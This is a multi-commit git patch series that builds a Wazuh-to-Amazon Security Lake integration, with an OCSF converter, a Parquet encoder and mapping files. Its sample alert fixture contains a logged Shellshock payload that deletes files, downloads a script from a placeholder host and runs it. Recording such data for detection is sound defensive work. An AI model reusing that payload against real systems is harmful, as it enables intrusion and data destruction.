+ "CC7.2", + "CC7.3" + ], + "description": "Shellshock attack attempt", + "groups": [ + "web", + "accesslog", + "attack" + ], + "mitre": { + "technique": [ + "Exploitation for Privilege Escalation", + "Exploit Public-Facing Application" + ], + "id": [ + "T1068", + "T1190" + ], + "tactic": [ + "Privilege Escalation", + "Initial Access" + ] + }, + "id": "31166", + "nist_800_53": [ + "SI.4" + ], + "info": "CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" + }, + "fields": { + "timestamp": [ + "2024-02-08T14:35:14.334Z" + ] + }, + "sort": [ + 1707402914334 + ] +} \ No newline at end of file From dcc119e07edfff1c99655a0755c9632662a662fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:34 +0100 Subject: [PATCH 13/34] Add OCSF converter + Parquet encoder + test scripts --- integrations/amazon-security-lake/.gitignore | 3 + .../{ => logstash}/pipe-output.conf | 0 .../{ => logstash}/wazuh-s3.conf | 1 + .../amazon-security-lake/ocsf/converter.py | 125 +++++++++--------- .../amazon-security-lake/parquet/parquet.py | 20 +++ .../amazon-security-lake/parquet/test.py | 11 ++ .../amazon-security-lake/requirements.txt | 2 + 7 files changed, 102 insertions(+), 60 deletions(-) create mode 100644 integrations/amazon-security-lake/.gitignore rename integrations/amazon-security-lake/{ => logstash}/pipe-output.conf (100%) rename integrations/amazon-security-lake/{ => logstash}/wazuh-s3.conf (97%) create mode 100644 integrations/amazon-security-lake/parquet/parquet.py create mode 100644 integrations/amazon-security-lake/parquet/test.py create mode 100644 integrations/amazon-security-lake/requirements.txt diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore new file mode 100644 index 0000000000000..56bf77e1b8d6f --- /dev/null +++ b/integrations/amazon-security-lake/.gitignore @@ -0,0 +1,3 @@ +.venv/ +wazuh-event.ocsf.json +*.parquet \ No newline at end of file diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/logstash/pipe-output.conf similarity index 100% rename from integrations/amazon-security-lake/pipe-output.conf rename to integrations/amazon-security-lake/logstash/pipe-output.conf diff --git a/integrations/amazon-security-lake/wazuh-s3.conf b/integrations/amazon-security-lake/logstash/wazuh-s3.conf similarity index 97% rename from integrations/amazon-security-lake/wazuh-s3.conf rename to integrations/amazon-security-lake/logstash/wazuh-s3.conf index 108423afd3193..6ca2ca0d5a08f 100644 --- a/integrations/amazon-security-lake/wazuh-s3.conf +++ b/integrations/amazon-security-lake/logstash/wazuh-s3.conf @@ -15,6 +15,7 @@ input { } } }' + target => "_source" schedule => "* * * * *" } } diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index a9168aead1e1a..fba84e7304dc7 100644 --- 
a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -3,6 +3,7 @@ # event comes from Filebeat event = {} + def normalize(level: int) -> int: """ Normalizes rule level into the 0-6 range, required by OCSF. @@ -10,73 +11,77 @@ def normalize(level: int) -> int: # TODO normalization return level + +def join(iterable, separator=","): + return (separator.join(iterable)) + + def convert(event: dict) -> dict: """ Converts Wazuh events to OCSF's Detecting Finding (2004) class. """ ocsf_class_template = \ - { - "activity_id": 1, - "category_name": "Findings", - "category_uid": 2, - "class_name": "Detection Finding", - "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], - "finding_info": { - "analytic": { - "category": event["_source"]["rule"]["groups"], # Err: rule.groups is a string array, but analytic.category is a string - "name": event["_source"]["decoder"]["name"], - "type": "Rule", # analytic.type is redundant together with type_id - "type_id": 1, - "uid": event["_source"]["rule"]["id"], - }, - "attacks": { - "tactic": event["_source"]["rule"]["mitre"]["tactic"], # Err: rule.mitre.tactic is a string array, but attacks.tactic is an object - "technique": event["_source"]["rule"]["mitre"]["technique"], # Err: rule.mitre.technique is a string array, but attacks.technique is an object - "version": "v13.1" - }, - "title": event["_source"]["rule"]["description"], - "types": [ - event["_source"]["input"]["type"] - ], - "uid": event["_source"]['id'] - }, - "metadata": { - "log_name": "Security events", - "log_provider": "Wazuh", - "product": { - "name": "Wazuh", - # Skipped. - # OCSF description of this field is: The version of the product, as - # defined by the event source. For example: 2013.1.3-beta. We do not - # save such info as part of the event data. - # "version": "4.9.0", - "lang": "en", - "vendor_name": "Wazuh, Inc,." + { + "activity_id": 1, + "category_name": "Findings", + "category_uid": 2, + "class_name": "Detection Finding", + "class_uid": 2004, + "count": event["_source"]["rule"]["firedtimes"], + "message": event["_source"]["rule"]["description"], + "finding_info": { + "analytic": { + "category": join(event["_source"]["rule"]["groups"]), + "name": event["_source"]["decoder"]["name"], + "type_id": 1, + "uid": event["_source"]["rule"]["id"], + }, + "attacks": { + "tactic": { + "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + }, + "technique": { + "name": join(event["_source"]["rule"]["mitre"]["technique"]), + "uid": join(event["_source"]["rule"]["mitre"]["id"]), + }, + "version": "v13.1" + }, + "title": event["_source"]["rule"]["description"], + "types": [ + event["_source"]["input"]["type"] + ], + "uid": event["_source"]['id'] }, - "version": "1.1.0", - }, - "raw_data": event["_source"]["full_log"], - "resources": [ - { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "metadata": { + "log_name": "Security events", + "log_provider": "Wazuh", + "product": { + "name": "Wazuh", + "lang": "en", + "vendor_name": "Wazuh, Inc,." 
+ }, + "version": "1.1.0", }, - ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), - "status_id": 99, - "time": event["_source"]["timestamp"], - "type_uid": 200401, - "unmapped": { - "data_sources": [ - event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + "raw_data": event["_source"]["full_log"], + "resources": [ + { + "name": event["_source"]["agent"]["name"], + "uid": event["_source"]["agent"]["id"] + }, ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "risk_score": event["_source"]["rule"]["level"], + "severity_id": normalize(event["_source"]["rule"]["level"]), + "status_id": 99, + "time": event["_source"]["timestamp"], + "type_uid": 200401, + "unmapped": { + "data_sources": [ + event["_index"], + event["_source"]["location"], + event["_source"]["manager"]["name"] + ], + "nist": event["_source"]["rule"]["nist_800_53"], # Array + } } - } - return ocsf_class_template \ No newline at end of file + return ocsf_class_template diff --git a/integrations/amazon-security-lake/parquet/parquet.py b/integrations/amazon-security-lake/parquet/parquet.py new file mode 100644 index 0000000000000..79a146f0993a2 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/parquet.py @@ -0,0 +1,20 @@ + +import pyarrow as pa +import pyarrow.parquet as pq +import pyarrow.fs as pafs + + +class Parquet: + + @staticmethod + def encode(data: dict): + return pa.Table.from_pydict(data) + + @staticmethod + def to_s3(data: pa.Table, s3: pafs.S3FileSystem): + pass + + @staticmethod + def to_file(data: pa.Table, path: str): + # pq.write_to_dataset(table=data, root_path=path) + pq.write_table(data, path) diff --git a/integrations/amazon-security-lake/parquet/test.py b/integrations/amazon-security-lake/parquet/test.py new file mode 100644 index 0000000000000..2022111b25e33 --- /dev/null +++ b/integrations/amazon-security-lake/parquet/test.py @@ -0,0 +1,11 @@ +#!/usr/bin/python + +import pyarrow as pa +from parquet import Parquet +import json + +# converted_event = {} +with open("wazuh-event.ocsf.json", "r") as fd: + events = [json.load(fd)] + table = pa.Table.from_pylist(events) + Parquet.to_file(table, "output/wazuh-event.ocsf.parquet") diff --git a/integrations/amazon-security-lake/requirements.txt b/integrations/amazon-security-lake/requirements.txt new file mode 100644 index 0000000000000..8c7a1cbaae79b --- /dev/null +++ b/integrations/amazon-security-lake/requirements.txt @@ -0,0 +1,2 @@ +pyarrow>=10.0.1 +parquet-tools>=0.2.15 \ No newline at end of file From 5c5ff2460219e16dae716f2b4cb3e4b4e493b391 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=81lex=20Ruiz?= Date: Fri, 9 Feb 2024 17:33:43 +0100 Subject: [PATCH 14/34] Update .gitignore --- integrations/amazon-security-lake/.gitignore | 180 ++++++++++++++++++- 1 file changed, 178 insertions(+), 2 deletions(-) diff --git a/integrations/amazon-security-lake/.gitignore b/integrations/amazon-security-lake/.gitignore index 56bf77e1b8d6f..0740f723d0c79 100644 --- a/integrations/amazon-security-lake/.gitignore +++ b/integrations/amazon-security-lake/.gitignore @@ -1,3 +1,179 @@ -.venv/ wazuh-event.ocsf.json -*.parquet \ No newline at end of file +*.parquet + +# Created by https://www.toptal.com/developers/gitignore/api/python +# Edit at https://www.toptal.com/developers/gitignore?templates=python + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python 
+build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ +cover/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +.pybuilder/ +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +# For a library or package, you might want to ignore these files since the code is +# intended to run in multiple environments; otherwise, check them in: +# .python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# poetry +# Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. +# This is especially recommended for binary packages to ensure reproducibility, and is more +# commonly ignored for libraries. +# https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control +#poetry.lock + +# pdm +# Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. +#pdm.lock +# pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it +# in version control. +# https://pdm.fming.dev/#use-with-ide +.pdm.toml + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ + +# pytype static type analyzer +.pytype/ + +# Cython debug symbols +cython_debug/ + +# PyCharm +# JetBrains specific template is maintained in a separate JetBrains.gitignore that can +# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore +# and can be added to the global gitignore or merged into this file. For a more nuclear +# option (not recommended) you can uncomment the following to ignore the entire idea folder. 
+#.idea/ + +### Python Patch ### +# Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration +poetry.toml + +# ruff +.ruff_cache/ + +# LSP config files +pyrightconfig.json + +# End of https://www.toptal.com/developers/gitignore/api/python \ No newline at end of file From a39ef909d11c4941551e63956b4ef7822c745a29 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 08:19:39 -0300 Subject: [PATCH 15/34] Include the contents of the alert under unmapped --- integrations/stdin_to_securitylake.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 3a6145747783a..09fba3ad554d4 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -26,6 +26,9 @@ def map_to_ocsf(alert_dictionary, mappings, ocsf_output): for field in depth_levels[1:]: current_level = current_level[field] ocsf_output[key] = current_level + ### We probably need to crop the fields we already + ### mapped to OCSF from ocsf_output + ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: From 97725bcd97667aff3664055447814bf277b6b89d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 8 Feb 2024 11:44:40 -0300 Subject: [PATCH 16/34] Add support for different OCSF schema versions --- integrations/ocsf-mapping.json | 116 ++++++++++++++++++-------- integrations/stdin_to_securitylake.py | 13 +-- 2 files changed, 87 insertions(+), 42 deletions(-) diff --git a/integrations/ocsf-mapping.json b/integrations/ocsf-mapping.json index b2cf6d3b8d3f7..c1238dac285df 100644 --- a/integrations/ocsf-mapping.json +++ b/integrations/ocsf-mapping.json @@ -1,42 +1,86 @@ { - "constants": + "1.0.0": { - "activity_id" : 1, - "analytic.type" : "Rule", - "analytic.type_id" : 1, - "attacks.version" : "v13.1", - "category_name" : "Findings", - "category_uid" : 2, - "class_name" : "Security Finding", - "class_uid" : 2001, - "metadata.log_name" : "Security events", - "metadata.log_provider" : "Wazuh", - "metadata.product.lang" : "en", - "metadata.product.name" : "Wazuh", - "metadata.product.vendor_name" : "Wazuh, Inc.", - "metadata.product.version" : "4.9.0", - "state_id" : 99, - "type_uid" : 200101 + "constants": + { + "activity_id" : 1, + "analytic.type" : "Rule", + "analytic.type_id" : 1, + "attacks.version" : "v13.1", + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "analytic.category" : "rule.groups", + "analytic.name" : "decoder.name", + "analytic.uid" : "rule.id", + "attacks.tactics" : "rule.mitre.tactic", + "attacks.technique" : "rule.mitre.technique", + "count" : "rule.firedtimes", + "data_sources" : ["_index", "location", "manager.name"], + "finding.title" : "rule.description", + "finding.types" : "input.type", + "finding.uid" : "id", + "message" : "rule.description", + "nist" : "rule.nist_800_53", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } }, - "mappings": + "1.1.0": { - "analytic.category" : 
"rule.groups", - "analytic.name" : "decoder.name", - "analytic.uid" : "rule.id", - "attacks.tactics" : "rule.mitre.tactic", - "attacks.technique" : "rule.mitre.technique", - "count" : "rule.firedtimes", - "data_sources" : ["_index", "location", "manager.name"], - "finding.title" : "rule.description", - "finding.type" : "input.type", - "finding.uid" : "id", - "message" : "rule.description", - "nist" : "rule.nist_800_53", - "raw_data" : "full_log", - "resources.name" : "agent.name", - "resources.uid" : "agent.id", - "risk_score" : "rule.level", - "severity_id" : "rule.level", - "time" : "timestamp" + "constants": + { + "activity_id" : 1, + "category_name" : "Findings", + "category_uid" : 2, + "class_name" : "Security Finding", + "class_uid" : 2001, + "finding_info.analytic.type" : "Rule", + "finding_info.analytic.type_id" : 1, + "finding_info.attacks.version" : "v13.1", + "metadata.log_name" : "Security events", + "metadata.log_provider" : "Wazuh", + "metadata.product.lang" : "en", + "metadata.product.name" : "Wazuh", + "metadata.product.vendor_name" : "Wazuh, Inc.", + "metadata.product.version" : "4.9.0", + "status_id" : 99, + "type_uid" : 200101 + }, + "mappings": + { + "count" : "rule.firedtimes", + "finding_info.analytic.category" : "rule.groups", + "finding_info.analytic.name" : "decoder.name", + "finding_info.analytic.uid" : "rule.id", + "finding_info.attacks.tactic" : "rule.mitre.tactic", + "finding_info.attacks.technique" : "rule.mitre.technique", + "finding_info.title" : "rule.description", + "finding_info.types" : "input.type", + "finding_info.uid" : "id", + "message" : "rule.description", + "raw_data" : "full_log", + "resources.name" : "agent.name", + "resources.uid" : "agent.id", + "risk_score" : "rule.level", + "severity_id" : "rule.level", + "time" : "timestamp" + } } } diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 09fba3ad554d4..5efb9da83bb80 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -13,13 +13,13 @@ s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output): +def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): ocsf_output = {} ### Put constants into the output alert - ocsf_output |= mappings['constants'] + ocsf_output |= mappings[ocsfschema]['constants'] - for key in mappings['mappings']: - dotted_destination_field = mappings['mappings'].get(key) + for key in mappings[ocsfschema]['mappings']: + dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) depth_levels = dotted_destination.split('.') current_level = alert_dictionary[depth_levels[0]] if len(depth_levels>1): @@ -51,7 +51,7 @@ def map_block(fileobject, length, mappings): alert = json.loads(line) ocsf_mapped_alert = {} map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): @@ -66,6 +66,7 @@ def parse_arguments(): parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') + parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', 
help='Location of the Wazuh Alert to OCSF mapping (json formatted)') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') @@ -95,7 +96,7 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings) + current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) From e313572485453506a8dda93711e0168bbcd2dec5 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:19:31 -0300 Subject: [PATCH 17/34] Use custom ocsf module to map alerts --- .../stdin_to_securitylake.py | 38 ++++++++++--------- 1 file changed, 20 insertions(+), 18 deletions(-) rename integrations/{ => amazon-security-lake}/stdin_to_securitylake.py (84%) diff --git a/integrations/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py similarity index 84% rename from integrations/stdin_to_securitylake.py rename to integrations/amazon-security-lake/stdin_to_securitylake.py index 5efb9da83bb80..21374d85ee0ad 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -9,26 +9,28 @@ from datetime import datetime from pyarrow import parquet, Table, fs +import ocsf + block_ending = { "block_ending": True } s3 = fs.S3FileSystem() -def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): - ocsf_output = {} - ### Put constants into the output alert - ocsf_output |= mappings[ocsfschema]['constants'] - - for key in mappings[ocsfschema]['mappings']: - dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) - depth_levels = dotted_destination.split('.') - current_level = alert_dictionary[depth_levels[0]] - if len(depth_levels>1): - for field in depth_levels[1:]: - current_level = current_level[field] - ocsf_output[key] = current_level - ### We probably need to crop the fields we already - ### mapped to OCSF from ocsf_output - ocsf_output['unmapped'] = alert_dictionary +#def map_to_ocsf(alert_dictionary, mappings, ocsf_output, ocsfschema): +# ocsf_output = {} +# ### Put constants into the output alert +# ocsf_output |= mappings[ocsfschema]['constants'] +# +# for key in mappings[ocsfschema]['mappings']: +# dotted_destination_field = mappings[ocsfschema]['mappings'].get(key) +# depth_levels = dotted_destination.split('.') +# current_level = alert_dictionary[depth_levels[0]] +# if len(depth_levels>1): +# for field in depth_levels[1:]: +# current_level = current_level[field] +# ocsf_output[key] = current_level +# ### We probably need to crop the fields we already +# ### mapped to OCSF from ocsf_output +# ocsf_output['unmapped'] = alert_dictionary def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: @@ -49,8 +51,8 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = {} - map_to_ocsf(alert, mappings, ocsf_mapped_alert): + ocsf_mapped_alert = ocsf.convert(alert) + #map_to_ocsf(alert, mappings, ocsf_mapped_alert): output.append(ocsf_mapped_alert) return output From 
4896d159912cdfc627e52eba2ebac3f5790d541e Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Thu, 15 Feb 2024 12:53:40 -0300 Subject: [PATCH 18/34] Modify script to use converter class --- .../amazon-security-lake/ocsf/converter.py | 40 ++++++++--------- .../stdin_to_securitylake.py | 45 +++++++++---------- 2 files changed, 42 insertions(+), 43 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index fba84e7304dc7..2a14b75957c97 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -27,30 +27,30 @@ def convert(event: dict) -> dict: "category_uid": 2, "class_name": "Detection Finding", "class_uid": 2004, - "count": event["_source"]["rule"]["firedtimes"], - "message": event["_source"]["rule"]["description"], + "count": event["rule"]["firedtimes"], + "message": event["rule"]["description"], "finding_info": { "analytic": { - "category": join(event["_source"]["rule"]["groups"]), - "name": event["_source"]["decoder"]["name"], + "category": join(event["rule"]["groups"]), + "name": event["decoder"]["name"], "type_id": 1, - "uid": event["_source"]["rule"]["id"], + "uid": event["rule"]["id"], }, "attacks": { "tactic": { - "name": join(event["_source"]["rule"]["mitre"]["tactic"]), + "name": join(event["rule"]["mitre"]["tactic"]), }, "technique": { - "name": join(event["_source"]["rule"]["mitre"]["technique"]), - "uid": join(event["_source"]["rule"]["mitre"]["id"]), + "name": join(event["rule"]["mitre"]["technique"]), + "uid": join(event["rule"]["mitre"]["id"]), }, "version": "v13.1" }, - "title": event["_source"]["rule"]["description"], + "title": event["rule"]["description"], "types": [ - event["_source"]["input"]["type"] + event["input"]["type"] ], - "uid": event["_source"]['id'] + "uid": event['id'] }, "metadata": { "log_name": "Security events", @@ -62,25 +62,25 @@ def convert(event: dict) -> dict: }, "version": "1.1.0", }, - "raw_data": event["_source"]["full_log"], + "raw_data": event["full_log"], "resources": [ { - "name": event["_source"]["agent"]["name"], - "uid": event["_source"]["agent"]["id"] + "name": event["agent"]["name"], + "uid": event["agent"]["id"] }, ], - "risk_score": event["_source"]["rule"]["level"], - "severity_id": normalize(event["_source"]["rule"]["level"]), + "risk_score": event["rule"]["level"], + "severity_id": normalize(event["rule"]["level"]), "status_id": 99, - "time": event["_source"]["timestamp"], + "time": event["timestamp"], "type_uid": 200401, "unmapped": { "data_sources": [ event["_index"], - event["_source"]["location"], - event["_source"]["manager"]["name"] + event["location"], + event["manager"]["name"] ], - "nist": event["_source"]["rule"]["nist_800_53"], # Array + "nist": event["rule"]["nist_800_53"], # Array } } diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index 21374d85ee0ad..49926a8aa1d64 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -6,10 +6,10 @@ import logging import time import json -from datetime import datetime +import datetime from pyarrow import parquet, Table, fs -import ocsf +from ocsf import converter block_ending = { "block_ending": True } @@ -43,7 +43,7 @@ def encode_parquet(list,bucket_name,folder): table = Table.from_pylist(list) parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name, folder)) -def 
map_block(fileobject, length, mappings): +def map_block(fileobject, length): output=[] for line in range(0, length): line = fileobject.readline() @@ -51,44 +51,41 @@ def map_block(fileobject, length, mappings): output.append(block_ending) break alert = json.loads(line) - ocsf_mapped_alert = ocsf.convert(alert) + ocsf_mapped_alert = converter.convert(alert) #map_to_ocsf(alert, mappings, ocsf_mapped_alert): - output.append(ocsf_mapped_alert) + output.append(ocsf_mapped_alert) return output def get_elapsedseconds(reference_timestamp): - current_time = datetime.now(tz='UTC') + current_time = datetime.datetime.now(datetime.timezone.utc) return (current_time - reference_timestamp).total_seconds() -def parse_arguments(): + +if __name__ == "__main__": + clock = datetime.datetime.now(datetime.timezone.utc) + clockstr = clock.strftime('%F_%H.%M.%S') parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') - parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval in seconds for pushing data to Security Lake') parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') parser.add_argument('-v','--ocsfschema', action='store', default='1.1.0', help='Version of the OCSF schema to use') parser.add_argument('-x','--mapping', action='store', default='ocsf-mapping.json', help='Location of the Wazuh Alert to OCSF mapping (json formatted)') - debugging = parser.add_argument_group('debugging') - debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') - debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + parser.add_argument('-o','--output', type=str, default="/tmp/stdintosecuritylake.txt", help='File path of the destination file to write to') + parser.add_argument('-d','--debug', action='store_true', help='Activate debugging') args = parser.parse_args() - -if __name__ == "__main__": - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H.%M.%S') - parse_arguments() - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.basicConfig(format='%(asctime)s %(message)s', filename=args.output, encoding='utf-8', level=logging.DEBUG) logging.info('BUFFERING STDIN') try: - with open(ocsf_mapping_filename) as jsonfile: - mappings = json.loads(jsonfile.read()) + #with open(ocsf_mapping_filename) as jsonfile: + # mappings = json.loads(jsonfile.read()) - with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + with os.fdopen(sys.stdin.fileno(), 'rt') as stdin: output_buffer = [] - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) try: while True: @@ -98,14 +95,14 @@ def parse_arguments(): ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas ### 
* https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory - current_block = map_block(stdin, args.linebuffer, mappings,args.ocsfschema) + current_block = map_block(stdin, args.linebuffer ) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: encode_parquet(output_buffer,args.bucketname,args.foldername) logging.debug(json.dumps(output_buffer)) - starttimestamp = datetime.now(tz='UTC') + starttimestamp = datetime.datetime.now(datetime.timezone.utc) output_buffer = [] output_buffer.append(current_block) @@ -117,4 +114,6 @@ def parse_arguments(): except Exception as e: logging.error("Error running script") + logging.error(e) + raise exit(1) From 7fd25d1213e605ceac965eb3eb31395c05072b3f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Fri, 16 Feb 2024 15:28:51 -0300 Subject: [PATCH 19/34] Code polish and fix errors --- .../amazon-security-lake/ocsf/converter.py | 152 +++++++++--------- .../stdin_to_securitylake.py | 87 +++------- 2 files changed, 102 insertions(+), 137 deletions(-) diff --git a/integrations/amazon-security-lake/ocsf/converter.py b/integrations/amazon-security-lake/ocsf/converter.py index 2a14b75957c97..c927afa8fe87f 100644 --- a/integrations/amazon-security-lake/ocsf/converter.py +++ b/integrations/amazon-security-lake/ocsf/converter.py @@ -1,87 +1,89 @@ -#!/usr/bin/python +#!/usr/bin/python3 # event comes from Filebeat -event = {} - +#event = {} +#print(event) def normalize(level: int) -> int: - """ - Normalizes rule level into the 0-6 range, required by OCSF. - """ - # TODO normalization - return level + """ + Normalizes rule level into the 0-6 range, required by OCSF. + """ + # TODO normalization + return level def join(iterable, separator=","): - return (separator.join(iterable)) + return (separator.join(iterable)) def convert(event: dict) -> dict: - """ - Converts Wazuh events to OCSF's Detecting Finding (2004) class. - """ - ocsf_class_template = \ + """ + Converts Wazuh events to OCSF's Detecting Finding (2004) class. 